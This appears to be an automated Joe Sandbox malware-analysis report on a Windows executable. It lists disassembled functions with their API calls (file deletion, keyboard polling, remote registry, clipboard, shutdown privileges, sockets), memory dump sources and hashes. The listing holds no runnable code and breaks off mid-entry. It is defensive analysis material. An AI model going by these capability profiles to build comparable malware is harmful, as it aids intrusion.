                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID: 0DJ$0EJ$0FJ$3cA$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGJ$_A
                    • API String ID: 0-559809668
                    • Opcode ID: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                    • Instruction ID: 6096d484c95c14ad7aa8192e29e4e3e8d71b99b3f093478e4f466f6acf52d5c9
                    • Opcode Fuzzy Hash: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                    • Instruction Fuzzy Hash: 13727E75E002199BDB14CF59C8807EEB7B5FF48311F15816BE809EB291E7389E85CB98
                    Function 0046F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0046F113
                    • _wcscmp.LIBCMT ref: 0046F128
                    • _wcscmp.LIBCMT ref: 0046F13F
                      • Part of subcall function 00464385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004643A0
                    • FindNextFileW.KERNEL32(00000000,?), ref: 0046F16E
                    • FindClose.KERNEL32(00000000), ref: 0046F179
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F195
                    • _wcscmp.LIBCMT ref: 0046F1BC
                    • _wcscmp.LIBCMT ref: 0046F1D3
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F1E5
                    • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F203
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F20D
                    • FindClose.KERNEL32(00000000), ref: 0046F21A
                    • FindClose.KERNEL32(00000000), ref: 0046F22C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                    • String ID: *.*
                    • API String ID: 1824444939-438819550
                    • Opcode ID: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                    • Instruction ID: 359f8111c83e04d014ff149dee767818393646aa3285bf91305061d844a33625
                    • Opcode Fuzzy Hash: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                    • Instruction Fuzzy Hash: 1031C3365001196ADF10AEA4FC54AEE77AC9F45360F2005BBE844A2190EA39DE89CA6D
                    Function 0046A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F
                    • __swprintf.LIBCMT ref: 0046A231
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293
                    • _memset.LIBCMT ref: 0046A2B2
                    • _wcsncpy.LIBCMT ref: 0046A2EE
                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323
                    • CloseHandle.KERNEL32(00000000), ref: 0046A32E
                    • RemoveDirectoryW.KERNEL32(?), ref: 0046A337
                    • CloseHandle.KERNEL32(00000000), ref: 0046A341
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                    • String ID: :$\$\??\%s
                    • API String ID: 2733774712-3457252023
                    • Opcode ID: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                    • Instruction ID: f10b276181cf8096dd79107661fba1eb4aa855f6953dd7c4d63ebe7d830bec3b
                    • Opcode Fuzzy Hash: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                    • Instruction Fuzzy Hash: 1E31C571500119ABDB20DFA0DC49FEF77BCEF88704F1044BAF908E2260E77496948B29
                    Function 0046001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?), ref: 00460097
                    • SetKeyboardState.USER32(?), ref: 00460102
                    • GetAsyncKeyState.USER32(000000A0), ref: 00460122
                    • GetKeyState.USER32(000000A0), ref: 00460139
                    • GetAsyncKeyState.USER32(000000A1), ref: 00460168
                    • GetKeyState.USER32(000000A1), ref: 00460179
                    • GetAsyncKeyState.USER32(00000011), ref: 004601A5
                    • GetKeyState.USER32(00000011), ref: 004601B3
                    • GetAsyncKeyState.USER32(00000012), ref: 004601DC
                    • GetKeyState.USER32(00000012), ref: 004601EA
                    • GetAsyncKeyState.USER32(0000005B), ref: 00460213
                    • GetKeyState.USER32(0000005B), ref: 00460221
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                    • Instruction ID: c6705f0abb03acfe1c66d12a8beead0d319d3067caf51b1e954f1b2a293a3a50
                    • Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                    • Instruction Fuzzy Hash: 7F51BC2090478829FB35D7A098547EBBFB49F12380F08459F99C2566C3FA5C9A8CC75B
                    Function 004803DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004804AC
                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0048054B
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004805E3
                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480822
                    • RegCloseKey.ADVAPI32(00000000), ref: 0048082F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                    • String ID:
                    • API String ID: 1240663315-0
                    • Opcode ID: 8542518c0941377969b425a9142a02189ed0d51512cf45e3ee4068e3fae0101d
                    • Instruction ID: efbac3d2c4afa975f371ae5d5fee671ec22ce1fa5a9a6cb729be810612663562
                    • Opcode Fuzzy Hash: 8542518c0941377969b425a9142a02189ed0d51512cf45e3ee4068e3fae0101d
                    • Instruction Fuzzy Hash: A5E16E71614200AFCB54EF25C891D2FBBE4EF89314B04896EF84ADB3A2D634ED45CB56
                    Function 00474164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                    • String ID:
                    • API String ID: 1737998785-0
                    • Opcode ID: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                    • Instruction ID: 6a8dd1f95291b63ae5b16d2a5a0d869dcb5166510358231783c1e180ef80644f
                    • Opcode Fuzzy Hash: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                    • Instruction Fuzzy Hash: CE2191352002109FDB00AF54EC09B6E7BA8EF44751F10847AF945E72A2EB38AC05CB5D
                    Function 004637EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                      • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                    • FindFirstFileW.KERNEL32(?,?), ref: 004638A3
                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0046394B
                    • MoveFileW.KERNEL32(?,?), ref: 0046395E
                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0046397B
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046399D
                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 004639B9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                    • String ID: \*.*
                    • API String ID: 4002782344-1173974218
                    • Opcode ID: 32dd859ec51da58861d6f9dcb4db6752a71db99bf47132f60a046952e6cdf141
                    • Instruction ID: 5f3270bf9419f81a9c4f0e0ab399985bb250d256c3569b2459e2ec67edc6ab47
                    • Opcode Fuzzy Hash: 32dd859ec51da58861d6f9dcb4db6752a71db99bf47132f60a046952e6cdf141
                    • Instruction Fuzzy Hash: 5551717180514CAACF05EFA1C9929EEB778AF14319F60047EE40277191EB396F0DCB5A
                    Function 0046F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F440
                    • Sleep.KERNEL32(0000000A), ref: 0046F470
                    • _wcscmp.LIBCMT ref: 0046F484
                    • _wcscmp.LIBCMT ref: 0046F49F
                    • FindNextFileW.KERNEL32(?,?), ref: 0046F53D
                    • FindClose.KERNEL32(00000000), ref: 0046F553
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                    • String ID: *.*
                    • API String ID: 713712311-438819550
                    • Opcode ID: 0fb37ddf953590d706fb9364c28091077e68f31a8b68d00aa4a0a6f7ff02baf6
                    • Instruction ID: 52678bcd3f78e7a2dee1500e624958e336d76892905c76040bb4fc6126c74c58
                    • Opcode Fuzzy Hash: 0fb37ddf953590d706fb9364c28091077e68f31a8b68d00aa4a0a6f7ff02baf6
                    • Instruction Fuzzy Hash: D0418D71904219AFCF10EF64DC45AEFBBB4FF04314F50446BE855A2291EB38AE88CB59
                    Function 00413030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __itow__swprintf
                    • String ID: 3cA$_A
                    • API String ID: 674341424-3480954128
                    • Opcode ID: b5ff72b53ff71591d332a2aabe0d5dc7d216b3689416c219ba8f5f8adc89534e
                    • Instruction ID: 703a96bf305cb9905ff3d3c25826e0fcfbd93ba8a00a4d78e9854e8314894fca
                    • Opcode Fuzzy Hash: b5ff72b53ff71591d332a2aabe0d5dc7d216b3689416c219ba8f5f8adc89534e
                    • Instruction Fuzzy Hash: AB229B716083009FD724DF14C881BABB7E4AF85314F11492EF89A97392DB78E945CB9B
                    Function 00415760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: d7d38795a2a293d5cf14b61abe6428a9d3663c4a5cb54905e264e5f2bc5239c3
                    • Instruction ID: fe3fa380dd79410c0d4e58696af30f423fcd40af0ea7aa6f8d28fb308e13f721
                    • Opcode Fuzzy Hash: d7d38795a2a293d5cf14b61abe6428a9d3663c4a5cb54905e264e5f2bc5239c3
                    • Instruction Fuzzy Hash: 9D12AC70A00609DFCF04DFA5D981AEEB3F5FF88304F10452AE846A7291EB39AD55CB59
                    Function 004651BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                      • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                      • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                    • ExitWindowsEx.USER32(?,00000000), ref: 004651F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                    • String ID: $@$SeShutdownPrivilege
                    • API String ID: 2234035333-194228
                    • Opcode ID: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                    • Instruction ID: a9b7a44e2451b6884de2a96c8f52f71cfd0e95415fa4985b61f57267d5601e10
                    • Opcode Fuzzy Hash: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                    • Instruction Fuzzy Hash: D201F7317916116BF7286668ACAAFBB7358DB05345F2008BBFD03E21D2FD591C058A9F
                    Function 00476283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                    Download Yara Rule
                    APIs
                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004762DC
                    • WSAGetLastError.WSOCK32(00000000), ref: 004762EB
                    • bind.WSOCK32(00000000,?,00000010), ref: 00476307
                    • listen.WSOCK32(00000000,00000005), ref: 00476316
                    • WSAGetLastError.WSOCK32(00000000), ref: 00476330
                    • closesocket.WSOCK32(00000000,00000000), ref: 00476344
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ErrorLast$bindclosesocketlistensocket
                    • String ID:
                    • API String ID: 1279440585-0
                    • Opcode ID: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                    • Instruction ID: 9cc0b371228dcaf8913226d6fe42490e105b9b769aefcc5547ebbaeef9b3f94b
                    • Opcode Fuzzy Hash: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                    • Instruction Fuzzy Hash: 6521F2312006049FCB10FF64C845A6EB7BAEF44324F15856EEC1AA73D2C734AC05CB59
                    Function 00415520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                      • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                    • _memmove.LIBCMT ref: 00450258
                    • _memmove.LIBCMT ref: 0045036D
                    • _memmove.LIBCMT ref: 00450414
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                    • String ID:
                    • API String ID: 1300846289-0
                    • Opcode ID: abb8a364f6375cf7ed3c27617171bcc33c0b941e786a2993e93d25adad6f172b
                    • Instruction ID: ce31bd404333394545349dab4fd8ad238969c684e33d592a62d2001407cdf1f6
                    • Opcode Fuzzy Hash: abb8a364f6375cf7ed3c27617171bcc33c0b941e786a2993e93d25adad6f172b
                    • Instruction Fuzzy Hash: 3202E270A00205DBCF04DF65D9816AEBBF5EF84304F54806EE80ADB392EB39D955CB99
                    Function 00401287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
                    • GetSysColor.USER32(0000000F), ref: 00401A4E
                    • SetBkColor.GDI32(?,00000000), ref: 00401A61
                      • Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ColorProc$LongWindow
                    • String ID:
                    • API String ID: 3744519093-0
                    • Opcode ID: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                    • Instruction ID: d041ec2a837aeb515327988813bafb0785b4d0a615f46c6b1421ede386c2745f
                    • Opcode Fuzzy Hash: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                    • Instruction Fuzzy Hash: A4A124B1202544BAE629BA694C88F7F255CDF45345F14053FF602F62F2CA3C9D429ABE
                    Function 00476747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0047679E
                    • WSAGetLastError.WSOCK32(00000000), ref: 004767C7
